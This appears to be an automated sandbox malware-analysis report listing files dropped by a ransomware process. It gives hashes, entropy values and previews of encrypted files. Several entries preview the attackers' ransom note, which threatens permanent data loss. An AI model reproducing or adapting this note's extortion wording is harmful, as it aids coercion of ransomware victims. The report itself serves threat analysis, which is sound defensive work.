                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.836042913767729
                            Encrypted:false
                            SSDEEP:24:XULmsu/1+oVDxBUn/2BSuane5uqzccJWlyNDIlLVRuzBov2pUTt8sUbM+lGiQacu:XUxM8GDxYOSR5Kc4WIQf6lhQ6YM
                            MD5:49C041C85E095A55E65919B4BB874043
                            SHA1:00B70C1CE668DD315C45AC2972E63EECAC856AFE
                            SHA-256:5CD51EC2B492B33897DF4D7FB8594E89A8CF7B868AC22F76B6A3ED7A38A09C69
                            SHA-512:41E79268645502445CF3B5C3C95CD5FA6116D21BDA0BDE48E7DB0A498BFDBB67FFA7B91245EAE8AA5145DC9A48299EB568DF4D85D0C867E0EE770F933DF75BC1
                            Malicious:false
                            Preview:FJ.}!..6x}?.N...n)..W.j.......T>.&.cH.A..r..=.....E1%..6W%..e..E.,Ro....._...@...92|..^.t..Qz_.9..D.KY........w...B....!S....<....k..x...g....:../"L.d..MX.;2*..G..M......;.F...)8......o...'q.7...O#..]...r..<.c>../<.......N..let...r.U3.p...m.w...C.z....Q ..n...,H.|.q.{u,?..}.Q.b}..i.g.w..r.a.;10.....O ".A.....8..u.!2Z.L.......Zx..a........n..+.S)....|.Gv..).....,....y.N....I..r...akf.Y/...6..h.9.1.|.`'...#D)...\U...y.c..g..A..Q.....89.Cx..{8..v.lo;.....B~7..s".cT....a..K...k+..|..t.d..M.....y.!;...h.&a.U]*p=_&sA....q..D~.1F..I...eKQ.]..`[.F......s..:.\.&.....H'...l.X0.@V....'.....3.......O..I.!...p..^...4......8..*....*.J..'....m..m.\G.W..]a@H..3.lA.....2...<.R3...<.^:i...[dh....t:....4..A^..r.n.0u.........g..`.y\.^..5.|w....EB(...}kp...r1..+F)....,.+[.iI..h..M...E....0@..P!.._....N..i..LG.....k.J:y..Z{g...1.....b..Oht$...X......kg..m.>.D.b.E0S.8|..M...sF...c.W..1.C!.u7<w/.Z (.j..S.%B!....v.).7.T<.c...Q.ziE..d...r.3..5.@h'.r...V...2..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.86643912778898
                            Encrypted:false
                            SSDEEP:24:1/oAGKO+27vK95X4kwvcoX+FTWojM3ivnelGiQacm0o:RlGKOlC9CkiXeVjMQnelhQ67
                            MD5:6A3370E18EE59BC3ADC2F9653600791D
                            SHA1:37BA4D94FDE7C81699C14768D842B330DA2A7A19
                            SHA-256:0D05A1C07652CB8A0D7B43E01CAB239EC2E988C1B50722D0B47A42F49FDACACC
                            SHA-512:C10C9D8F9E89CE88AB984D4D9826A001AB3D99E28EBCD0143ADE72612A93497A0827EBBE970683AF9A1353598BA795C1BA328263708C564B0D0AD66C6E7C21F8
                            Malicious:false
                            Preview:e...q7. $..5*..aY....".d5.E......^...A.q..\.tk.-X.b.i..TX./..g..E; 1.Qs....._}......@yV:+.!...3W../H.J.ipt..[=.9..M.-..:S.E...a.l._ #.o.8Y._t>..q..1hW.D...9..s......6^......V......i..J.....`m1..."..NOJV\G..X..^...3_.+#4...........$..9...o..........>......%+a.Z..rE+z.6....y.n... u.0<..l.ux.....).#..N.]_..._...Y..N..$.@D.K.f..K..7o..{.......y....Kjk.]..)..^..X...\...p5.....g.$.s.~.8..;..".`...[`.....<....O.3.....s.0.c2K....I.T.5.m........1..yy2.T...@./...B.......S....+.Ka..q..1...*3aC.}..xh.]...G. ..d..hs.(..F,..Y2.S..Q...B..X....#;.P...Fl...}0..P.J.7..X>.e....q..B.9........~..0.o.....V...i...x.nj..}..Pn.n?kT.R....(...*......:2.....G$.q.t.d[..|Z..q...j)u..?.u.../.Ro....u.....N1...y^.T..F.3y...#$6..T.TR...r.....g...U.d.S...A.ug.$.*[.J......?sp.9.,=&..I.Mc./o..!Cp.|i.4..^jPj.=......B..VX.(9S....$)..?..{@K.[....Bb..3..........:........D{y...@..B..RX|+.0C.......3./^..........._.\.i..V...|.....4.....1...tH.X..:.....p...L.._G.R.K......p".o.F...A..{.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.855225979401013
                            Encrypted:false
                            SSDEEP:24:rU3C1PF+HJ3KQMeYCHuYV7ASfqcktU9eB2jUezmlGiQacmi/:rUoN6SeYZYVnJkmIB2jUezmlhQ6i/
                            MD5:EE7A8C1C851886EA0FD71BC2579FA4CD
                            SHA1:9501FA1F34C179413190E4B4CBEF60C307342263
                            SHA-256:142AE703A2FD4DF574B5F3C41E9FD1744119702201058BBB92873FF815DD2432
                            SHA-512:1A83C371C41205858736BE49DA692D20B2634E993A155625EFD701322B54433741D10C8805C04585C3C06C3AAB04D8334A5EE294E59E74EB6EB82A2B4CB2B75C
                            Malicious:false
                            Preview:...d.T....$..l...h......TZ.....7.1..Z.w..a.I[.~.@.2 ....;W..b...i....Cu......L..|6.........2.D.P.hr=.N.......-.Ll.E"lj..4;..../..y.).....B'..F...(\.c.[....~3)./p.o...q..>.......%N+9..8,4.ds......ej..}.9....wB..............4^.k9...3.4.].'..MBy...n.;.H..i)+_.6.NN-...v?.K.:.....D....8...../.vT..G..Y.an9.>.N).. .R..0?.....&2o....."..........&?#YZk@y..*......=...3.#.?..z..\.s..l..J{N.;...m4<@.U.K.v..j......:c..35.Eg...GI....T1.!..$c.4..?......PG..s.3.9.r..3#R...O.B2....R..oh...`..#m.A .{.~1kc...gw.g.Px W,J.%..D.......<M.x...C..z&......(M..4...>.q.:}1.q.....Mo.B....X..........B..Df.3m..S.Z.zj.Q...)..X....HHyT.-...@..8......N.24.B.....5OGW..b..;..[%.Z-.[... ..`.l..3.tC..(.K......8K.W...Sw.X.c......".\>......_.....E=......rD.{.8.."............7!....=>.(...{...$ .v...y%*..k.#..)..>.3.qf.e.(5...aT.[........bA.c.[.....s9."L...U_Z*..P.}Sf_...b.ez3...._.W.N......S.9...U.M.Ro.K2.Kp....+.O.J...1n.A..3.x......|......e4l.....`y..~...6.L<.2x@
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.843274770926716
                            Encrypted:false
                            SSDEEP:24:WbsK0jjhgYI+HsnmYHKfNw6No2OhuwuyRfEaFdylGiQacmV:LXjjzH7VHiuwumilhQ6V
                            MD5:62CCF4D09BB572C3CD33CDCD39F5D20E
                            SHA1:E3A53E766DD62E60370F1476902A7F8CC3129D9A
                            SHA-256:84DE774F5BF62AB823171DCFFBB57094042E3FCC483222E4896DA65C4C144264
                            SHA-512:4E54999888C8DE5FD7FC5755BA404713AB1E70ED224027CA912909A3339BDA6C91B761F3F988CAA09E25980CBFF016722B316878417C43452CFE06F0A1A04AE3
                            Malicious:false
                            Preview:....J...0.&G&.<..+.ot.l......uS..5...mT.K.+D|..9..8..3........".....,.H........(..Z.]....z........C;.........w.`...9.c.!..B(...F"..>eFb...:!E..7..D..k..:..,....@.(eD2..L&kk!.])F..@F.F...=u..CD.L...v.yU.....YF.]....(.D..c............7.l.....X..M..e.c@...`.\.E..F.e...........f...a.y...6.A/..m....n........T..k...[.%...^DT.+..YX.%C.p..........K..+....a.t.. ......g.J.....+ru|"JIcay$..T..P...D..G...dqN..`8.....-.0.....S..b.rA...Cc...Uu\.[..........a.r.......18.....o.....dB<B_{.....#..0......gH.u../.W.....O.~..u..pP.{4....;.a.U.T,.1..`X.w....*.lZ.....#......xm..q..8^.4......#7.|w...0d..c[`..,..H#...Y=..n.y.A.vH.....h*(9m.........3.......`jp...U.K_0.D..W.......R*.Z...e....-.&.7.h.b3....f.R..II|,.&P`4..yiQ$..*..]R....V...h..[4.8~..n.pa....f..^...,U.7..ztV...DC...s1.NVC..).;...(..8.....e.5O).mJ..\.....7U..W.(%p...._...^..EgTsC.K.G...}.'.T..[...#.&.9..[.......HW...{,../..%|?g.A.V.HPH..&....}.)..m.%{Y..\.Y$...M. ..D`.Zh..L..=...Q.q...R.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.858444269609048
                            Encrypted:false
                            SSDEEP:24:Vwm5/vrJ6EmogS3z1cOJtO7uj4H7iWXULfbTJVRk7J22lGiQacmIOBM:ewleoFJfHSE4b7ULBTSnlhQ6IOBM
                            MD5:09D7A1A0F78CF34E6C0628A630EACCED
                            SHA1:9D01A48F71366F6348BD062F0A12B078C8F871F2
                            SHA-256:83747878B2C049822D98FBCFB95E0E6CE8AA838353B5129908D7EEF6AE78D08E
                            SHA-512:348E6712D404F19375DC0A5AFC5FDDEDCB1887FCD3F550A5E48A63E4457E80BB902CB6F2D3605B9C4B9778DCB5EB2467F6110FE389CB723EAA80C788004FD05A
                            Malicious:false
                            Preview:...wo.Wh..._4..p...:.s2o...Z..H;.......Q....r.....^.l...{.i.!.)...g8....o..{..7..k\.cg%#.....zdi..!,.......-..!..`..a5.N.....b=.sy....{`...U.g.:...E..`._...."*O.r..?.Z.....y'..De......&.v..f..u..-n?..,}-J........v.C..A...y...9f.....;..}W.1.......V..v;.....bC.L..#.......,.gjx.W.c.'..[.S..'e..].\. L...p..s..q.).VP...k...'...C.[...1G.....f,O...H...%.....%U..>..&......".....C...RW.?<...@{~..T9..[.808..N7....OM.G./.y....>F..)x".../*.Q7d.....Zj.,...:.._.?I.4.E.b .R$R...x..6........2..\.[..;...p..E....j....yT...r..=o#.T.:P.4.U..T8.n.UAK.+yC4...u....U.11Q.-..[.)!i?.~'z..6!S@.J]..`.f:..zT.....Kk$.g...a.NN.W.JZ.\g.4...Sm'...N....K...qeTk....An>.'...B..2.....H..N.4.S..yJ.%sV)...`p...q...J.t....S...x=.9o.e.+~n...C.b....4......R|.9C..g..&!M.H.g.).5.8...'.K.....(A.vy....E.T.........r...#.....j..V...5........H%.....*[...k.....V!..Y+...R.....T.x.|D.1...`..X+..9..b.lgV..v.....C.3..b.G+..d...u..M..e[.r.5......O.....V..D$...F.}.hQ~C._:0._....1.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.866066280284776
                            Encrypted:false
                            SSDEEP:24:B7hPrNAetypMT4NAWIjzu4yBt4aQ5lXwwnz0P+ekhbwrlGiQacm1Qe:5hPpnkpMcmW46TL4zYIzG+BmlhQ61Qe
                            MD5:35529AF76A74234E4AE63246142B4AF8
                            SHA1:DEAC0BDC067878017C21F38E406DE9A3ED46FD8C
                            SHA-256:3EAD8CB9160BEEE1459B37ABFB10FA3682E98079E95AF80B278C113DEBB62DCA
                            SHA-512:9A2ADF6B963088694699EEC1EE9316016103CAC2C14079D50478D2D0339B9B41C5A8CB68ED269B6AE0611093FA7B51318FB8425C10FFD762B4F0DE5A2D4E9D95
                            Malicious:false
                            Preview:.y..1.i..-.;._(Z....M!.)....DX........K.0....=H.Ok...Q.,.v.T.`../.......0.-].y(\4......dw.v.7.o..P...jY...._wE.|)(a7WI..a..{@a...5.[&.v$@.I.-........n}........|..3.7.<.r.......s..h....n....,....D8}.+..iI...<.$.}.@.D/.....g.8.....htB..1...w-.".&.j._G....ib1..j.C..R.J.$....F.ld.U..l.<....3}..^s......Q..&;.v>=.-..}..C.#N.@..$...:.h..~./E..fS..o.6.?#.E....e.t..`Q 9.<r.S...y....(r.Y...)-....6..x..GVGD.EG(y.]..^k.IL.V..lcx`Q....zW.....h...i.fO..4[....[!.._......G..S....F..v.,uR...m@...(6u..(.....w[..-..+.P.9..k..'b+.Z..o...}...*....5..h"...D7.s.g*H......n........U..Z.~.a..%..G...K...;.7v.d.t..\...s.h..;..en-.`b.5.o.;q8...:..Mo.)..>..x...^.7...e.._......)Y.E.<.... ....P.%.G.k.H.........zjnD..,I..!t.7>'Zx%..w\..J#......m.......p....8..My.#....PN.P?...448......l)xzT...+|.2&...r.P....5s...P8f....Hs.F.Y;..y........m.....^j..)-X~ #tG_...E....|.....B.mvq.6..!.5..l...AY..Hn4^...wO....4...Z.....nM.*..FE....69...PWl....E.+.s.ec....W....qq9.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.86372621123122
                            Encrypted:false
                            SSDEEP:24:KRtfKcejC3NmSsvrN9W5DusVSi+dRCkjz+g2+bYnWNclGiQacmxH+:etf+C9Nszwh+dMkjN2+s5lhQ6Z+
                            MD5:0097307F4F28BB722A0FD5AEE5AC4EDF
                            SHA1:AAA28263D0A3FD52264EC762C5FD36B7B8DE0484
                            SHA-256:DAA30F7D7C37057D6D05AACF2023AEEA2D19327E51E495554BA4FF6A58E7432E
                            SHA-512:3117F568B2E60F16A74D3F6513A930A0A190523E7A1EEB15B752E2F2329C508F5271DF818A5242F01A807E3A3BD48423F9B26EDF0987A0E402A8AF1EFCD43B22
                            Malicious:false
                            Preview:6n...m.&...]...=U:i..Y..)....n*......Yr.*].i..n..2j..^.N.....9.;....z.<....8I../.<q..e.T..y....]..\....X...8..4.xl4....8..5.S...W.8. ..\.&..9"H..bA..Yi...V.u.E...I...g.O).Z....+..An.aI..|....<..?h..ez<a.{o.)'h......!j..>.&.... ?..xt .no........2..2f!_.PX........B.?!.o..@N...C..Y.W@....'...Pi.}bC....:.....L5.sw...#......!{.X..........".2sKT.[BK.b..... ...V:.....A.=..m..B$..6@.../*.r..n..~!..JPv..[`..|dt...W.R....8.....c}CaJt.hU.......=3..?......'....S2.g_.........ot...I.t...z+..0..e.....e.m.u'..B.....hPB..N...&..v..&.j..G._j8...M{.,*....$xnO.6.......f.g...P.F#.O.xH.*}>G#i*..D.|...}...L.L...\9_..$&fE...XR......"......e.G...5.....tF"'P....0...pEU~.Pp...$...Q.gd8V..7..._W...-..u.l.e6.........M...GB...x.....k.<\...%K..A?.9S.G..Mi.IyD.:.m...`Ja.$.?L.n\.j.d..-...=.6Xy....sx.u.J...-<<a2...D.Fw..&.Ra.5<v..........4.RK.....;.=.%ww..:7.l......{.f...u.g..Y..O=1...d....4$.....k...*.ep\..k..m..3.....x.......:}..6[.Z.>..'X........7.#.Q*.......B.....Jx.?..+.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.84188966379285
                            Encrypted:false
                            SSDEEP:24:orXL2rHfvbnypA2C4U/yO6HvgzTqoyI65FfdQ3Hifud6z16lGiQacmq61:QXLA/vLeXC4Uh6YHq+65F1Q3Cf4qQlhp
                            MD5:6BD6B082905EF5471F25512D52EE0FBE
                            SHA1:FCB46C7C911B38CA2D5F73050E8CD8357E4DD084
                            SHA-256:5095356F2DFBB95FC8396A60C23803059D52BB262FC7061593C185362265485A
                            SHA-512:E27B9DC5B9337591B5ADF4AE4258291E49DFCE825815DD656519B1FE0F6B384DCF94403C0206A04BD4050E8214C50E70CC47179F437EA7F8DEFBA0EF2EB0E671
                            Malicious:false
                            Preview:P.....p._.H..{..h.'....eOt.1.M..<.w....?...O.'.0...O=.5Q......=e.T..#...1.av.DF."v...;..!.b.*...m.7..O".p.e..$...P.&...o&...>t.+N."O...~..w&A..5..y....^..P.d......2M...H...&..U.ow.......]....{...D...q..Z.$V....o..M.....P. .o"!k'.G.?.............!.q]...-.T.......WO.g.&....(...........N.. ..x`w.d......L..W#.....X...."...g=....ib...^._.......V..Z..........Gy!P.:F......4l... ..9..gfZ.y...'].-.%jVd&.\..g....E..U..2.S#.K.w*I......O.N.E8.v..@=.u>.-._X.r..?M.?.b[;mCb.(.dgx.giux4.`%{@us.\QR.j..7./.~.Fx...X.*.....b.....b.472F..Z...-r......k...V%.,".W.......#.^.X..&...l..5.=...#...7-K7..!5..<I....$.....g.t.C]..(-.N.b.vzMn.....???!-.'.cp.Mi.w.&.~....9.T...._(..$I...7x.$.....>.Q1k.....J+<d...:c...f....o6m'gI....(~........~...F$..C~s..d.]]\.....K,..]..w..?i&..+..`.~."....=...&.Ww.1.....0rX.{....<..-D.k"....ib...........g..)gU.M.T{m.......@&.q*#..@+..@..a...x.....*s.@."..|.Df..dR4h.I...I....+zi...g..W.Q.V..VI.B..$.=Kd-G5.*&+..z..Z...D{.!.b.....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831497508161925
                            Encrypted:false
                            SSDEEP:24:m/V5cXxiv9FpsDnEqFbs4IVjWrn/54QOt7RPK8sz/lGiQacmbVml/:mt5cXa9Fp6Vbz0WnGJ7RmlhQ6bsl/
                            MD5:6382C9B44E6BD83E637CC9240C691518
                            SHA1:2FCB192B59E8E985A9B40CCE857964AB9A69540E
                            SHA-256:6B3F9F3357355AE6E182A2E259114E09A3FB5C6BCDE86772033EAE8155F57C20
                            SHA-512:A8374451E1F9BEE041BAAF72CC2E11354C17510A6A7D8018439264AEF1886F6C76027D4E2CC972F1820F89F5649103395C8AFC417A8DACED6AC1A610CE3AD942
                            Malicious:false
                            Preview:...N.d.......Te+.z..G...Vy]?.i%......I.q.....2"....HO?.Y"w>..;..]Ek.(...D... .7(.4BR.:....0.u.....S...2\.t3j1..^..p....N..>Q..N.@.f[.....%.O[.AJ....@..m...b.S...V.n..F...mN.El.&...*|.2a........!z?....[.....D...M?.....U0P...&....1:3..r.....|.r..D.|n..... >.?....D.A.N ./gA<.n>L....'* .....o0N....[.Z).,.<.E..4..t..m.zl.\&.A....8..L.Iv..o....3.....0.F...C..d.".1.G(o;s.S...8.t4....(g&qB.g>n.$......D..W..&.........*...Xw.A.2.O..8#.Io7{.2...L...E.w...Y.T..?.<.. E...\.&+..m`../.i....s..~g.F..'..wq..F.....'..W1F.W.u..U_.6....0$*..^U...F..WX_~.H)(..KIM...o-.....O.$I.>.........wp..O.D..3.....\C,.....g.....~\E%..I.G.{...J... .....p...<.....@.1........ .-.4...'...1..<.Pl.T.....Vx.>.;...g..C..*...JJt...^.P./..\...K.].'.....2^sG|.>.......QR.I$.E.#........(V...a.....9.%.e..Z_.x.Gd..r\T..V,...!.>.B...\.!h.S+X".....)7wt..WM.....u)..........V..........;U*aU........AsK.|!.j......K.........&......X.9..]...{&.a...u...9.fW..;....&.8.N.'V.G..:..'0)..R.O,....R
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.839074001296642
                            Encrypted:false
                            SSDEEP:24:6W9RzdOcL501AVoJV7BpfytZ9uEAUuGlGiQacmEafr:v9twW0OArfyTXjuGlhQ6Eur
                            MD5:D4F60E3CF9319ABB4D8D7A7BDBBCB64C
                            SHA1:3A18C295744F90692334144146AA9703858D3474
                            SHA-256:A1DAE56C9ED6E8009AA569BDEAB4A670C31C8A79E0126DF56FD22F9A0135D307
                            SHA-512:C2947A9E07F2E5EB0D20ADF9C75A67052123D6E359882C6D0A2A8A5777EB83480A4B1D8858912FFCC9E532F436B385122E60E0901E84478D5C6D2B872E44C522
                            Malicious:false
                            Preview:l.l.n....uL.8.Y..j.J....>.F.HF..k(....T...HXz.;...3..\..5..'.....`.%,w...%d..Z..x......!_..H.q..GOaj..|O;H.....E....%.{.Y .x.Y...<v.P..BZ_ld.`.3...X..y...T.)B.).\Z..........#.m..1L...A....l........j.Nw..PS....".2q..3...t....N....=..'(.+Q...2.6....L&....g6....Z66^....*J0.1.z ...tSt.....0...[B..6Y.)..>.&05.\..{j..D.....C..i}X2..".".3...k.E8..f.......+.M...[s.Dh....5)Om..`Bz..^.Z`.o....^.x...$.oyCQ..........-:..h/.....f&...M.PYE.E.@;.....8a.._`.*.R.<31............W.+........8e.....{s.n...M/Z._.E,...**ABIEboCl.Ccx..K..hZ%...V...1..\.GN...a.Rz..T....~.5{.mJ\....i........y..u....5...6f..*s...A..................O.i6o..qT..E........55..- Np.l..e.c:.....f.....NHf............'..Hm_..I>..f.....m.O...&.@..W...H02.=x.]v....?.....ch.;p...8...dA#>vk.E.....#%l....y+.-e#(......[X..)....H"{.I(..|......d..c..|,..7`..F.]...|..=B...{.........w.&.3../.K......P.F.Z`<....P.._....0.{@.4.....N..g.y.......ZV.....n=4.s)...|..."[...`z....peH..?.B..._............+S...1
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.854001220598612
                            Encrypted:false
                            SSDEEP:24:6ItkkOCNnZLQf6cu7vp8gJ9UIgWveENIwjnqTMZA/9i0BlGiQacmmF:6pkO9fjW8lEewGTR/9FlhQ6mF
                            MD5:7F39518D7002BE4C9076D10E732A310E
                            SHA1:D2A59F27A38E0A4E1F6400BCEBE602CF27AF98E8
                            SHA-256:4302DB5979BC75DFAEBFD12CD6651D370FEDCBD9BC5FA8F4CFDA1E4D75CF1AFA
                            SHA-512:41D039C51E6988189D3E0B123A5296DB0E0B50225FAE3DF4CCB5AA6865C891E38FC787193CD9B770F534253EA493653984C84B443402D63E3B73A07D8BD75F7F
                            Malicious:false
